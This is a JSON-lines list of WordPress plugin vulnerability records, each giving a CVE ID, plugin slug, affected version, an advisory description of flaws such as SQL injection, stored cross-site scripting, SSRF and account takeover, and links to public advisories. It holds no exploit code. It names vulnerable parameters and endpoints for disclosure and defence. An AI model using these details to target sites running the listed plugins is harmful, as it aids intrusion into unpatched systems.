{"CVE_ID":"CVE-2024-49333","slug":"hmenu","versionImpact":"1.16.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NotFound Hero Mega Menu - Responsive WordPress Menu Plugin allows SQL Injection. This issue affects Hero Mega Menu - Responsive WordPress Menu Plugin: from n\/a through 1.16.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1407","slug":"amo-team-showcase","versionImpact":"1.1.4","description":"The AMO Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's amoteam_skills shortcode in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amo-team-showcase\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amo-team-showcase\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0950d3-4d7b-457a-8e67-df310d2712d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0950d3-4d7b-457a-8e67-df310d2712d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13411","slug":"zapier","versionImpact":"1.5.1","description":"The Zapier for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5.1 via the updated_user() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257975\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257975\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zapier\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zapier\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701dc461-88e7-40bf-a4fb-f92723b6e05e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701dc461-88e7-40bf-a4fb-f92723b6e05e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2543","slug":"advanced-accordion-block","versionImpact":"5.0.1","description":"The Advanced Accordion Gutenberg Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L363\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L363\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L364\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L364\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-accordion-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-accordion-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79752ac3-cb5f-4d86-be58-c4b892e4edd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79752ac3-cb5f-4d86-be58-c4b892e4edd6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8295","slug":"employee-directory","versionImpact":"4.5.1","description":"The Employee Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg\u2019 parameter in all versions up to, and including, 4.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/employee-directory\\\/tags\\\/4.5.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/employee-directory\\\/tags\\\/4.5.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336753\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336753\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/employee-directory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/employee-directory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d06d721-ab48-43ae-81d6-bd0b3177a7bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d06d721-ab48-43ae-81d6-bd0b3177a7bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1918","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_preload_single_callback function. This makes it possible for unauthenticated attackers to invoke a cache building action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8034ff-cf36-498f-9efc-a4e6bbb92b2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8034ff-cf36-498f-9efc-a4e6bbb92b2c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5231","slug":"magic-action-box","versionImpact":"2.17.2","description":"The Magic Action Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 2.17.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magic-action-box\\\/tags\\\/2.17.2\\\/lib\\\/functions.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magic-action-box\\\/tags\\\/2.17.2\\\/lib\\\/functions.php#L287\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9b908b-1388-41fb-915c-e4e29eaf57ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9b908b-1388-41fb-915c-e4e29eaf57ed?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0678","slug":"order-delivery-date","versionImpact":"1.2","description":"The Order Delivery Date for WP e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'available-days-tf' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-delivery-date\\\/trunk\\\/order_delivery_date.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-delivery-date\\\/trunk\\\/order_delivery_date.php#L221\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1981","slug":"wpvivid-backuprestore","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to SQL Injection via the 'table_prefix' parameter in version 0.9.68 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8bfb38-4f20-4f9f-bb30-a88f3be2d2d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"name\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1181","slug":"coming-soon-wp","versionImpact":"2.1.2","description":"The Coming Soon, Under Construction & Maintenance Mode By Dazzler plugin for WordPress is vulnerable to maintenance mode bypass in all versions up to, and including, 2.1.2. This is due to the plugin relying on the REQUEST_URI to determine if the page being accesses is an admin area.  This makes it possible for unauthenticated attackers to bypass maintenance mode and access the site which may be considered confidential when in maintenance mode.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-wp\\\/trunk\\\/coming-soon-wp.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-wp\\\/trunk\\\/coming-soon-wp.php#L45\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4043","slug":"wp-ultimate-post-grid","versionImpact":"3.9.1","description":"The WP Ultimate Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpupg-text' shortcode in all versions up to, and including, 3.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14e897f0-11e6-43b1-908c-be4ecdc7fd58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14e897f0-11e6-43b1-908c-be4ecdc7fd58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wpupg-sc-text.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wpupg-sc-text.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086319\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086319\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6848","slug":"post-and-page-builder","versionImpact":"1.26.6","description":"The Post and Page Builder by BoldGrid \u2013 Visual Drag and Drop Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 1.26.6 due to insufficient input sanitization and output escaping affecting the boldgrid_canvas_image AJAX endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d5dcec8-fa36-43ab-9a35-0b391fe1d88e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d5dcec8-fa36-43ab-9a35-0b391fe1d88e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/tags\\\/1.26.6\\\/includes\\\/class-boldgrid-editor-ajax.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/tags\\\/1.26.6\\\/includes\\\/class-boldgrid-editor-ajax.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/613\\\/commits\\\/64c33a6d0c9dbb0151d3af5fee9e026df6c5a2f6\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/613\\\/commits\\\/64c33a6d0c9dbb0151d3af5fee9e026df6c5a2f6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/issues\\\/612\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/issues\\\/612\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8729","slug":"easy-social-share-buttons","versionImpact":"1.4.5","description":"The Easy Social Share Buttons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616bb6c-0861-4920-a589-f2c5bb819164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616bb6c-0861-4920-a589-f2c5bb819164?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-social-share-buttons\\\/trunk\\\/includes\\\/class-easy-social-share-buttons-settings.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-social-share-buttons\\\/trunk\\\/includes\\\/class-easy-social-share-buttons-settings.php#L271\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9637","slug":"wpschoolpress","versionImpact":"2.2.10","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.10. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for authenticated attackers, with teacher-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/411693fc-9df3-44b1-9a6f-58a6e8ef23b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/411693fc-9df3-44b1-9a6f-58a6e8ef23b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.9\\\/lib\\\/wpsp-ajaxworks-teacher.php#L598\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.9\\\/lib\\\/wpsp-ajaxworks-teacher.php#L598\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49303","slug":"hmenu","versionImpact":"1.16.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NotFound Hero Mega Menu - Responsive WordPress Menu Plugin allows SQL Injection. This issue affects Hero Mega Menu - Responsive WordPress Menu Plugin: from n\/a through 1.16.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1406","slug":"newpost-catch","versionImpact":"1.3.19","description":"The Newpost Catch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's npc shortcode in all versions up to, and including, 1.3.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newpost-catch\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newpost-catch\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbbea6bf-b795-4837-9dc9-7cb8769ab89f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbbea6bf-b795-4837-9dc9-7cb8769ab89f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1703","slug":"ultimate-blocks","versionImpact":"3.2.7","description":"The Ultimate Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 3.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260377\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/responsive-control\\\/class-responsive-control.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2520d98-3cee-4431-bf9c-b2fd01a584ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2520d98-3cee-4431-bf9c-b2fd01a584ce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1284","slug":"xc-woo-google-cloud-print","versionImpact":"4.1","description":"The Woocommerce Automatic Order Printing | ( Formerly WooCommerce Google Cloud Print) plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1 via the xc_woo_printer_preview AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other user's invoices and orders which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-google-cloud-print\\\/21129093\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-google-cloud-print\\\/21129093\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f593dce-4b56-46c0-becd-75fd16f165a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f593dce-4b56-46c0-becd-75fd16f165a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8294","slug":"download-counter","versionImpact":"1.3","description":"The Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018name\u2019 parameter in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338968\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338968\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-counter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-counter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcf7936-8a28-45b9-a9dc-fd7257a83a84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcf7936-8a28-45b9-a9dc-fd7257a83a84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25049","slug":"ecommerce-product-catalog","versionImpact":"3.3.4","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress plugin <= 3.3.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4308","slug":"user-submitted-posts","versionImpact":"20230809","description":"The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018user-submitted-content\u2019 parameter in versions up to, and including, 20230809 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2952471\\\/user-submitted-posts\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2952471\\\/user-submitted-posts\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bb4d37c-c4c2-4523-9b4e-73ffb7be81ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bb4d37c-c4c2-4523-9b4e-73ffb7be81ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
